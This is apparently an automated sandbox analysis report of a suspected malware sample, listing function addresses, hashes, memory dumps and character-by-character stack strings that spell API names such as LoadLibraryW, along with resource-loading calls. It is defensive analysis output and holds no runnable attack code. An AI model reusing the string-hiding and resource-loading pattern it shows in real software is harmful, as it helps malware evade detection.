Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-4041529859
Opcode ID: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
Instruction ID: 5e8891abed41657f7e989aadf462fdff952da4f4b7056756378e3675ff061b49
Opcode Fuzzy Hash: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
Instruction Fuzzy Hash: F1910671E082A48EE7208624DC947EA7BB6EF91314F1480FAD48D97282D6795FC1CB66

Function 0041C19A Relevance: 17.7, Strings: 14, Instructions: 217COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-4041529859
Opcode ID: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
Instruction ID: df58a994ca3e62e78a3978717fc5b382f7e4bc14de4042cd30d801fb280ed65f
Opcode Fuzzy Hash: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
Instruction Fuzzy Hash: 4781D371E082548EF7208624DC94BEBBBB5EF91314F1480FAD48D97282D77D5EC18B66

Function 00412870 Relevance: 16.5, Strings: 13, Instructions: 279COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-670065755
Opcode ID: 04cd663a305100ff744e96d32187111e82a4a4c72b6d18e17701d8053a8f4d5b
Instruction ID: 8e4c9e4c0d213e81a69a2f097f07e83ae8129e60fcc16c5653f83553ae497e9c
Opcode Fuzzy Hash: 04cd663a305100ff744e96d32187111e82a4a4c72b6d18e17701d8053a8f4d5b
Instruction Fuzzy Hash: CFB1D0B2D152689AEB20CB24DC547EAB6B5EF94300F0480FAD84CA7681E67D4FC18F56

Function 00411417 Relevance: 16.5, Strings: 13, Instructions: 235COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-670065755
Opcode ID: 843339b22289e3979556d4e76daa7ad6b0792d50617dfb5ddccf231471b293b2
Instruction ID: 92a06a7b704b035e2e60822e5d68c6c72a3efa40825da9904a1d49f5bfbc794b
Opcode Fuzzy Hash: 843339b22289e3979556d4e76daa7ad6b0792d50617dfb5ddccf231471b293b2
Instruction Fuzzy Hash: A591F1B2E052A89AE7208B24DC447EABBB5EF55300F0480FAD44CA7691D77D4FC58F96

Function 0040C6DA Relevance: 15.5, Strings: 12, Instructions: 512COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 7b85bc52e6808b9baae9e79d314a20e5738770e981a817103ffb0fb2372c2800
Instruction ID: 914a459b03d2a2b63b855c5f7d67586353b6cb6e6c31b5fdc1fcf3b625d68fdb
Opcode Fuzzy Hash: 7b85bc52e6808b9baae9e79d314a20e5738770e981a817103ffb0fb2372c2800
Instruction Fuzzy Hash: 6B12BFB2D046689AE7248B15DC94BEBBA75EF84310F1441FAD80DA7280E33D5EC5CF66

Function 0040C21D Relevance: 15.4, Strings: 12, Instructions: 385COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 094c74763ee6e4f48dbf42b18b6cf1c1ad80c5b7682997bc4b0f76ef296411d9
Instruction ID: da7636832d6d3e4347b5bc72744a32114747a310d61eee35d2d044c8e859236b
Opcode Fuzzy Hash: 094c74763ee6e4f48dbf42b18b6cf1c1ad80c5b7682997bc4b0f76ef296411d9
Instruction Fuzzy Hash: ABF17D71D05268DBEB24CB14CC90BEAB7B5FB84304F1482FAD44DA6281D6395EC2CF56

Function 0040C465 Relevance: 15.2, Strings: 12, Instructions: 211COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: ebb65651caa7aede6cb4031899aed8a803e9f11667bf4dd6a799a52f4202491c
Instruction ID: 69bacb652bb99dfde4aee098304b2cdbed0ced8900f92b2597216527d9bcfb0e
Opcode Fuzzy Hash: ebb65651caa7aede6cb4031899aed8a803e9f11667bf4dd6a799a52f4202491c
Instruction Fuzzy Hash: BC81E1B1D08668DAF7218B24DC94BEABAB5EF90300F0481FAD44DA7681D37D1EC58F16

Function 0040C4CD Relevance: 15.2, Strings: 12, Instructions: 208COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 14bf14cefdc2b72e7d6837cf3c8567c9f606d2ab2b2aa7be318d4205c241f5ec
Instruction ID: a64aedf2c8d6eacc216962f0a1ed59b9aaa95d6b6d6511588f4be3c2821d3289
Opcode Fuzzy Hash: 14bf14cefdc2b72e7d6837cf3c8567c9f606d2ab2b2aa7be318d4205c241f5ec
Instruction Fuzzy Hash: D581E1B1D08668DAF7218B24DC94BEABAB5EF90304F0481FAC44DA76C0D73D1EC18B16

Function 0040C471 Relevance: 15.2, Strings: 12, Instructions: 206COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 335d1bd73f922021f96bf1e55129336020ca8556b6c23ec9cebbc5f9e032945b
Instruction ID: 292ddd3b266090356df2182c853dd82522a8dac9334ef34c09640febfcc53569
Opcode Fuzzy Hash: 335d1bd73f922021f96bf1e55129336020ca8556b6c23ec9cebbc5f9e032945b
Instruction Fuzzy Hash: C981D1B1D08668DAF7218B24DC94BEABAB5EF90300F0481FAD44DA7681D37D1EC58F16

Function 0040C717 Relevance: 15.2, Strings: 12, Instructions: 197COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 06b2a0d70721d91fac1293ca16444907a88d2e3ddb0061ec035759c462f42aaa
Instruction ID: c658fcb4eb42c25c48cc16f900622dbbb37ec02de6ee8474502fae10e98cbf88
Opcode Fuzzy Hash: 06b2a0d70721d91fac1293ca16444907a88d2e3ddb0061ec035759c462f42aaa
Instruction Fuzzy Hash: 48710762D08268DAF7208B24DC44BEBBA75EF94300F0481FAD44DA7281D37D1EC5CB66

Function 0040C58F Relevance: 15.2, Strings: 12, Instructions: 167COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: d20e6f8add3cc496b25eee42fc6c94b88c60413763a817ac61984a952a94720e
Instruction ID: b1c9b549e76fbac57a4e755773afad4df7d121e39477e2b0d97b09d2f2632640
Opcode Fuzzy Hash: d20e6f8add3cc496b25eee42fc6c94b88c60413763a817ac61984a952a94720e
Instruction Fuzzy Hash: 4A61D4A1D08699CEF7218B24DC94BEABA76EF90300F0481FAD44D676C1D37E1EC58B56

Function 0040C5BD Relevance: 15.2, Strings: 12, Instructions: 155COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: b95c76e2ca22fc866fbc818bf191a40661a55585611bb795bc6a8716bffec365
Instruction ID: 97c516a55b3af2165b9cc6a01ac0630e803d37c015ccf732dc7d52516949326c
Opcode Fuzzy Hash: b95c76e2ca22fc866fbc818bf191a40661a55585611bb795bc6a8716bffec365
Instruction Fuzzy Hash: E851D1A1D08699CEF7218B24DC54BEABA76EF91300F0481FAC04D676C1D37E0EC58B56

Function 0040C603 Relevance: 15.1, Strings: 12, Instructions: 140COMMON

Download Yara Rule

Strings

b, xrefs: 0040CA25
a, xrefs: 0040CA09
y, xrefs: 0040CA41
o, xrefs: 0040CA02
L, xrefs: 0040CA17
i, xrefs: 0040CA1E
a, xrefs: 0040CA33
r, xrefs: 0040CA2C
r, xrefs: 0040CA3A
W, xrefs: 0040CA48
d, xrefs: 0040CA10
L, xrefs: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 74988f59038c82e649426195d26bab4ecbd9dd27a8aec18a6f9d9ebd2319cecf
Instruction ID: 7c4d75c6526d95267b203406be231b8214f60a9b2a645593e80a69d7ea6768e6
Opcode Fuzzy Hash: 74988f59038c82e649426195d26bab4ecbd9dd27a8aec18a6f9d9ebd2319cecf
Instruction Fuzzy Hash: 2C51E4A1D0C6A9CAF7218724DC54BEABA76EF91304F0481F9C04D6B6C1D77E0EC58B66

Function 00470440 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 302COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,0000006C,UIDATA,C1DE166F,?,00000008,?), ref: 00470497
LoadResource.KERNEL32(?,00000000), ref: 004704B5
SizeofResource.KERNEL32(?,00000000), ref: 004704D2
FreeResource.KERNEL32(00000000), ref: 004704E4
_memset.LIBCMT ref: 00470523
LockResource.KERNEL32(00000000), ref: 0047052C
FreeResource.KERNEL32(00000000), ref: 00470827

Strings

UIDATA, xrefs: 00470486

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Resource$Free$FindLoadLockSizeof_memset
String ID: UIDATA
API String ID: 22797042-37798676
Opcode ID: 378b3840f4d67aacf5828a0d82858fd3667b8e2b66c82b16812347760bbfe2da
Instruction ID: 2929f7a4e9b14c725ebed58b75a369a5a9340c9cc9a66a4216e42831b50c3819
Opcode Fuzzy Hash: 378b3840f4d67aacf5828a0d82858fd3667b8e2b66c82b16812347760bbfe2da
Instruction Fuzzy Hash: 87C1F071D01218DBDF14DFA8C881BEEB7B5AF44304F1481AEE909AB241DB786E45CF95

Function 0047A660 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0047A66A
OpenThread.KERNEL32(00000040,00000001,-00000008,00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000), ref: 0047A6C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6CB
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6FA
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC), ref: 0047A704
OutputDebugStringW.KERNEL32(****** ,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A711
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A71A

Strings

****** , xrefs: 0047A70C

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
